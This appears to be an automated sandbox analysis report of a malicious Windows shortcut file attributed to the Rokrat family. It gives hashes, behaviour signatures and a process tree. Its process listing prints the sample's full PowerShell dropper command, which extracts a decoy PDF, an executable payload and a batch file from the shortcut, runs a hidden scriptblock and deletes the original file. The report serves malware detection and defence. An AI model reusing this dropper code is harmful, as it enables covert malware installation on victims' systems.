Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
29-05-2024 10:21
Behavioral task
behavioral1
Sample
358122718ba11b3e8bb56340dbe94f51.lnk
Resource
win7-20240419-en
General
-
Target
358122718ba11b3e8bb56340dbe94f51.lnk
-
Size
56.2MB
-
MD5
358122718ba11b3e8bb56340dbe94f51
-
SHA1
0c61effe0c06d57835ead4a574dde992515b9382
-
SHA256
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
-
SHA512
7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01
-
SSDEEP
98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn
Malware Config
Signatures
-
Detect Rokrat payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2400-154-0x0000000032730000-0x0000000032813000-memory.dmp family_rokrat behavioral2/memory/2400-155-0x0000000032730000-0x0000000032813000-memory.dmp family_rokrat -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 40 2400 powershell.exe 65 2400 powershell.exe 77 2400 powershell.exe -
Processes:
powershell.exepowershell.exepid process 1200 powershell.exe 2400 powershell.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
powershell.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation cmd.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1200 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\29738.dat powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.pdf pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exeAcroRd32.exepid process 1200 powershell.exe 1200 powershell.exe 2400 powershell.exe 2400 powershell.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 2400 powershell.exe 2400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 1056 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
AcroRd32.exepid process 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe 1056 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exepowershell.execmd.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 1052 wrote to memory of 3984 1052 cmd.exe cmd.exe PID 1052 wrote to memory of 3984 1052 cmd.exe cmd.exe PID 1052 wrote to memory of 3984 1052 cmd.exe cmd.exe PID 3984 wrote to memory of 552 3984 cmd.exe cmd.exe PID 3984 wrote to memory of 552 3984 cmd.exe cmd.exe PID 3984 wrote to memory of 552 3984 cmd.exe cmd.exe PID 3984 wrote to memory of 1200 3984 cmd.exe powershell.exe PID 3984 wrote to memory of 1200 3984 cmd.exe powershell.exe PID 3984 wrote to memory of 1200 3984 cmd.exe powershell.exe PID 1200 wrote to memory of 1056 1200 powershell.exe AcroRd32.exe PID 1200 wrote to memory of 1056 1200 powershell.exe AcroRd32.exe PID 1200 wrote to memory of 1056 1200 powershell.exe AcroRd32.exe PID 1200 wrote to memory of 4740 1200 powershell.exe cmd.exe PID 1200 wrote to memory of 4740 1200 powershell.exe cmd.exe PID 1200 wrote to memory of 4740 1200 powershell.exe cmd.exe PID 4740 wrote to memory of 2400 4740 cmd.exe powershell.exe PID 4740 wrote to memory of 2400 4740 cmd.exe powershell.exe PID 4740 wrote to memory of 2400 4740 cmd.exe powershell.exe PID 1056 wrote to memory of 5052 1056 AcroRd32.exe RdrCEF.exe PID 1056 wrote to memory of 5052 1056 AcroRd32.exe RdrCEF.exe PID 1056 wrote to memory of 5052 1056 AcroRd32.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 712 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 3176 5052 RdrCEF.exe RdrCEF.exe PID 5052 wrote to memory of 3176 5052 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit2⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od3⤵PID:552
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"3⤵
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B5D991F21062F1BE61C7838068167AA7 --mojo-platform-channel-handle=1712 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:712
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EE3BAA2080B589FFCF0D18AC7463471A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EE3BAA2080B589FFCF0D18AC7463471A --renderer-client-id=2 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:16⤵PID:3176
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=80599FB9A18E473675B56CDF5576936B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=80599FB9A18E473675B56CDF5576936B --renderer-client-id=4 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job /prefetch:16⤵PID:5100
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F4A574B36389ADADBFD195B56106E223 --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:3068
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2F7EC23A04E7F2904EAE901C2454893E --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:5092
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6BC179532047CEFB78C8AE2E03110640 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:1172
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gdmm2eux\gdmm2eux.cmdline"6⤵PID:4792
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96E1.tmp" "c:\Users\Admin\AppData\Local\Temp\gdmm2eux\CSC8FE661A738F94C7998AEBB6B257F4B.TMP"7⤵PID:1556
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v3msmmn1\v3msmmn1.cmdline"6⤵PID:1760
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97BC.tmp" "c:\Users\Admin\AppData\Local\Temp\v3msmmn1\CSCD7E0D82BC2F45638AA3EF785A1523D3.TMP"7⤵PID:3452
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gyjiz0ru\gyjiz0ru.cmdline"6⤵PID:3604
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES98C5.tmp" "c:\Users\Admin\AppData\Local\Temp\gyjiz0ru\CSCD7E116374FC4713B48BD324225A59A.TMP"7⤵PID:1376
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tr3fyq00\tr3fyq00.cmdline"6⤵PID:3116
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A2D.tmp" "c:\Users\Admin\AppData\Local\Temp\tr3fyq00\CSC6891B5EF9954ECAB699AF18685F2119.TMP"7⤵PID:1804
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4188
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD59bc8ffa368a2746ee6bc8bd079212fcb
SHA159765d5aab3114411bfec93e7810ffe5e51226ed
SHA256b0a4462abedd91c610bc7d12c21ed9eba4acb4fcba31a428830369835110962c
SHA512a4f0948366aa03381888929854ab6fdfaa03538acba93c3278958adfab626c226426545f62c81b56c8ef6018546ab0fb15392977635bfaadf80ecd7050723459
-
Filesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
Filesize
18KB
MD5e44f74cd775dfea646fc81686f9169ff
SHA10c2110cf7544ec788ffac5d80ec3273f9514fc36
SHA25672d19c785abf7c7bc832bf8080d18b0a6e7907807a9a8e2ac1759ba4e6c6485f
